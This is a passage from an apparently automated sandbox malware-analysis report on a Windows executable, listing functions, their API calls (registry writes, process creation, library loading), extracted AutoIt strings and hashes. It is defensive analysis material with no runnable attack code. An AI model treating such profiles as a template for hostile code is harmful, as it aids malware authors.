                                                  • API String ID: 4175595110-0
                                                  • Opcode ID: 1b45ad112029b764290fbb4710e5bac9a3823a38104dd231babef8b953343ba2
                                                  • Instruction ID: 034d50e98f4c10d9a9e5f21b8de67feeafee9b666ff04490e6046d8e464ab63f
                                                  • Opcode Fuzzy Hash: 1b45ad112029b764290fbb4710e5bac9a3823a38104dd231babef8b953343ba2
                                                  • Instruction Fuzzy Hash: 29715C7290060AEBDF209FA4DC49FBEBBB9BF04310F185115FA19E6192D7359A16CB60
                                                  Function 0061C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0061C4BD
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0062CC08,00000000,?,00000000,?,?), ref: 0061C544
                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0061C5A4
                                                  • _wcslen.LIBCMT ref: 0061C5F4
                                                  • _wcslen.LIBCMT ref: 0061C66F
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0061C6B2
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0061C7C1
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0061C84D
                                                  • RegCloseKey.ADVAPI32(?), ref: 0061C881
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0061C88E
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0061C960
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 9721498-966354055
                                                  • Opcode ID: 0cef7e27ca62b02b766d2e21e02a9b11518dd952437fa4acb3a9aefc3ac718e4
                                                  • Instruction ID: 7fe58bf80a590e68760c5a2bc4dd5b0d95fcdaa6d9d294eebc42bd35e6809dce
                                                  • Opcode Fuzzy Hash: 0cef7e27ca62b02b766d2e21e02a9b11518dd952437fa4acb3a9aefc3ac718e4
                                                  • Instruction Fuzzy Hash: 2D125D356042019FDB14DF14C895A6EBBE6FF88724F19885DF84A9B3A2DB31ED41CB81
                                                  Function 0062091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 006209C6
                                                  • _wcslen.LIBCMT ref: 00620A01
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00620A54
                                                  • _wcslen.LIBCMT ref: 00620A8A
                                                  • _wcslen.LIBCMT ref: 00620B06
                                                  • _wcslen.LIBCMT ref: 00620B81
                                                    • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
                                                    • Part of subcall function 005F2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005F2BFA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                  • API String ID: 1103490817-4258414348
                                                  • Opcode ID: aec8a8a4aa198a594c6ea4516fbc55269004357309bb28bf0ae97426784e756c
                                                  • Instruction ID: a9248b1ca63fe63a73dd8828ee9ce65f3013f176ce27fadae02bf15e4d653cfd
                                                  • Opcode Fuzzy Hash: aec8a8a4aa198a594c6ea4516fbc55269004357309bb28bf0ae97426784e756c
                                                  • Instruction Fuzzy Hash: 42E19931208B129FCB14DF24D45096ABBE2BFD8314F51895DF8969B3A2D731ED4ACB81
                                                  Function 0061C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 1256254125-909552448
                                                  • Opcode ID: 77435cb24420ad5b894f57c3fe7fc8f80d709edbaf2a0184b64706f5ccea65ab
                                                  • Instruction ID: 7791123dbfac706ef6becd0ae66e8e51abf821fbeb189bf2e6166b32a24e50cc
                                                  • Opcode Fuzzy Hash: 77435cb24420ad5b894f57c3fe7fc8f80d709edbaf2a0184b64706f5ccea65ab
                                                  • Instruction Fuzzy Hash: 0871DF3268412A8BCB20DE7CD9515FE37A3AFA1760F290128EC6697384E631DDC5C3A0
                                                  Function 0062833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0062835A
                                                  • _wcslen.LIBCMT ref: 0062836E
                                                  • _wcslen.LIBCMT ref: 00628391
                                                  • _wcslen.LIBCMT ref: 006283B4
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006283F2
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0062361A,?), ref: 0062844E
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628487
                                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006284CA
                                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00628501
                                                  • FreeLibrary.KERNEL32(?), ref: 0062850D
                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0062851D
                                                  • DestroyIcon.USER32(?), ref: 0062852C
                                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00628549
                                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00628555
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                  • String ID: .dll$.exe$.icl
                                                  • API String ID: 799131459-1154884017
                                                  • Opcode ID: 01fa9fa990da13ad581adea3f066ae278f33a88c3cc6aaf35eb4a5b6d0fcafa4
                                                  • Instruction ID: a14b23ca4746800f289dad6fd222f2f68616a0456d0bc49820b84d7366f84dab
                                                  • Opcode Fuzzy Hash: 01fa9fa990da13ad581adea3f066ae278f33a88c3cc6aaf35eb4a5b6d0fcafa4
                                                  • Instruction Fuzzy Hash: 3761ED71500A26BFEB24DF64DC45BFE7BA9BF48B21F104109F815E61D1DB74AA90CBA0
                                                  Function 00597778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 0-1645009161
                                                  • Opcode ID: bc90e3dd2131a83cd03e464db405ca9bc6578ed969fc6cab46610e5f18a2ff98
                                                  • Instruction ID: 6e240656d2e2837c3982e56d7637bdf29f0d2c13acb48504fc038db43e0741a9
                                                  • Opcode Fuzzy Hash: bc90e3dd2131a83cd03e464db405ca9bc6578ed969fc6cab46610e5f18a2ff98
                                                  • Instruction Fuzzy Hash: CF81097161060ABBDF20AFA4DC46FBE3FA9FF59300F044426F904AA292EB70D915C791
                                                  Function 005F5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000063), ref: 005F5A2E
                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 005F5A40
                                                  • SetWindowTextW.USER32(?,?), ref: 005F5A57
                                                  • GetDlgItem.USER32(?,000003EA), ref: 005F5A6C
                                                  • SetWindowTextW.USER32(00000000,?), ref: 005F5A72
                                                  • GetDlgItem.USER32(?,000003E9), ref: 005F5A82
                                                  • SetWindowTextW.USER32(00000000,?), ref: 005F5A88
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 005F5AA9
                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 005F5AC3
                                                  • GetWindowRect.USER32(?,?), ref: 005F5ACC
                                                  • _wcslen.LIBCMT ref: 005F5B33
                                                  • SetWindowTextW.USER32(?,?), ref: 005F5B6F
                                                  • GetDesktopWindow.USER32 ref: 005F5B75
                                                  • GetWindowRect.USER32(00000000), ref: 005F5B7C
                                                  • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 005F5BD3
                                                  • GetClientRect.USER32(?,?), ref: 005F5BE0
                                                  • PostMessageW.USER32(?,00000005,00000000,?), ref: 005F5C05
                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 005F5C2F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                  • String ID:
                                                  • API String ID: 895679908-0
                                                  • Opcode ID: b6ec4e89e305fbffc5830e227d5f8c677d15f71d31e92d18c308d3053cf242bc
                                                  • Instruction ID: 97a5b35eabd2fbaec5fb0b635edacc57c8d3f9235be52d5ecd61710ac3d9e1f9
                                                  • Opcode Fuzzy Hash: b6ec4e89e305fbffc5830e227d5f8c677d15f71d31e92d18c308d3053cf242bc
                                                  • Instruction Fuzzy Hash: 42715031900B09AFDB20DFA8CE49A7EBBF5FF48715F104918E682A35A0E775E945CB50
                                                  Function 005F30F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen
                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[e
                                                  • API String ID: 176396367-3722887849
                                                  • Opcode ID: 1ec91a135d1d39aa4b2ead660fbd0e36abc75449818b95dd62a0e6e5ecb86992
                                                  • Instruction ID: 0ffe8aea335eafb6d230b27e878ae7b16ab4bf0418327d92032eb0d93ecbf4c7
                                                  • Opcode Fuzzy Hash: 1ec91a135d1d39aa4b2ead660fbd0e36abc75449818b95dd62a0e6e5ecb86992
                                                  • Instruction Fuzzy Hash: 17E10831A0051AABEF14DFB4C4596FEFFB1BF84710F148519E656A7240DB34AE89C790
                                                  Function 005B00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005B00C6
                                                    • Part of subcall function 005B00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0066070C,00000FA0,88E828E0,?,?,?,?,005D23B3,000000FF), ref: 005B011C
                                                    • Part of subcall function 005B00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005D23B3,000000FF), ref: 005B0127
                                                    • Part of subcall function 005B00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005D23B3,000000FF), ref: 005B0138
                                                    • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005B014E
                                                    • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005B015C
                                                    • Part of subcall function 005B00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005B016A
                                                    • Part of subcall function 005B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B0195
                                                    • Part of subcall function 005B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005B01A0
                                                  • ___scrt_fastfail.LIBCMT ref: 005B00E7
                                                    • Part of subcall function 005B00A3: __onexit.LIBCMT ref: 005B00A9
                                                  Strings
                                                  • kernel32.dll, xrefs: 005B0133
                                                  • SleepConditionVariableCS, xrefs: 005B0154
                                                  • WakeAllConditionVariable, xrefs: 005B0162
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005B0122
                                                  • InitializeConditionVariable, xrefs: 005B0148
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                  • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 66158676-1714406822
                                                  • Opcode ID: d27074b44a879c07d6560d52f06a6fa6431b5df56e4cb282035ff0417104fe15
                                                  • Instruction ID: 7d1c12631a300f9f429dac8f17bf761d8348e879ec1a4ac326d12294006619d8
                                                  • Opcode Fuzzy Hash: d27074b44a879c07d6560d52f06a6fa6431b5df56e4cb282035ff0417104fe15
                                                  • Instruction Fuzzy Hash: AF21CC32644F116BE7245BA8AC0EBAF7FA6FF45B61F011535F801A62D1DB74AC00CA90
                                                  Function 006044C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(00000000,00000000,0062CC08), ref: 00604527
                                                  • _wcslen.LIBCMT ref: 0060453B
                                                  • _wcslen.LIBCMT ref: 00604599
                                                  • _wcslen.LIBCMT ref: 006045F4
                                                  • _wcslen.LIBCMT ref: 0060463F
                                                  • _wcslen.LIBCMT ref: 006046A7
                                                    • Part of subcall function 005AF9F2: _wcslen.LIBCMT ref: 005AF9FD
                                                  • GetDriveTypeW.KERNEL32(?,00656BF0,00000061), ref: 00604743
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: _wcslen$BuffCharDriveLowerType
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2055661098-1000479233
                                                  • Opcode ID: f94c8022bc924f63344ee06a3dc2d5580fc2d085f78bee9f761949ff541023a5
                                                  • Instruction ID: 8edf4d9fa6a5fc277ebf06214f5d70592fff7198f251090457d53b5fd878cb25
                                                  • Opcode Fuzzy Hash: f94c8022bc924f63344ee06a3dc2d5580fc2d085f78bee9f761949ff541023a5
                                                  • Instruction Fuzzy Hash: D7B1F3B15483029BC728DF28C890AABBBE6BFE5710F50491DF69687291EB31D845CB52
                                                  Function 0062911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00629147
                                                    • Part of subcall function 00627674: ClientToScreen.USER32(?,?), ref: 0062769A
                                                    • Part of subcall function 00627674: GetWindowRect.USER32(?,?), ref: 00627710
                                                    • Part of subcall function 00627674: PtInRect.USER32(?,?,00628B89), ref: 00627720
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 006291B0
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006291BB
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006291DE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00629225
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 0062923E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00629255
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00629277
                                                  • DragFinish.SHELL32(?), ref: 0062927E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00629371
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#f
                                                  • API String ID: 221274066-3566790704
                                                  • Opcode ID: ca94742f14b082d15f0baba7c90518b749ce206812f6ec6d0b61f1dc7d0ca022
                                                  • Instruction ID: 1f585d886b538417e8591c401182b7d8cc868352a3e883690c822b0fa2a22fe6
                                                  • Opcode Fuzzy Hash: ca94742f14b082d15f0baba7c90518b749ce206812f6ec6d0b61f1dc7d0ca022
                                                  • Instruction Fuzzy Hash: 89613771108701AFC701EF54DC89DAFBBEAFBC9750F00092EB595961A1DB709A49CBA2
                                                  Function 0061AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0061B198
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0061B1B0
                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0061B1D4
                                                  • _wcslen.LIBCMT ref: 0061B200
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0061B214
                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0061B236
                                                  • _wcslen.LIBCMT ref: 0061B332
                                                    • Part of subcall function 006005A7: GetStdHandle.KERNEL32(000000F6), ref: 006005C6
                                                  • _wcslen.LIBCMT ref: 0061B34B
                                                  • _wcslen.LIBCMT ref: 0061B366
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0061B3B6
                                                  • GetLastError.KERNEL32(00000000), ref: 0061B407
                                                  • CloseHandle.KERNEL32(?), ref: 0061B439
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061B44A
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061B45C
                                                  • CloseHandle.KERNEL32(00000000), ref: 0061B46E
                                                  • CloseHandle.KERNEL32(?), ref: 0061B4E3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1731410400.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                                                  • Associated: 00000000.00000002.1731389614.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731575020.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.0000000000666000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1731594685.000000000067A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_590000_BDlwy8b7Km.jbxd
                                                  Similarity
                                                  • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 2178637699-0
                                                  • Opcode ID: 7c95ad5b8e4e4f9654bad42e26acbf0dd78b0659d0c05ec5ce13886695a5e25c
                                                  • Instruction ID: da8662ed81ac62bf71843f234efa2c4b6aea54158d013e169f3dc1c384bd87a8
                                                  • Opcode Fuzzy Hash: 7c95ad5b8e4e4f9654bad42e26acbf0dd78b0659d0c05ec5ce13886695a5e25c
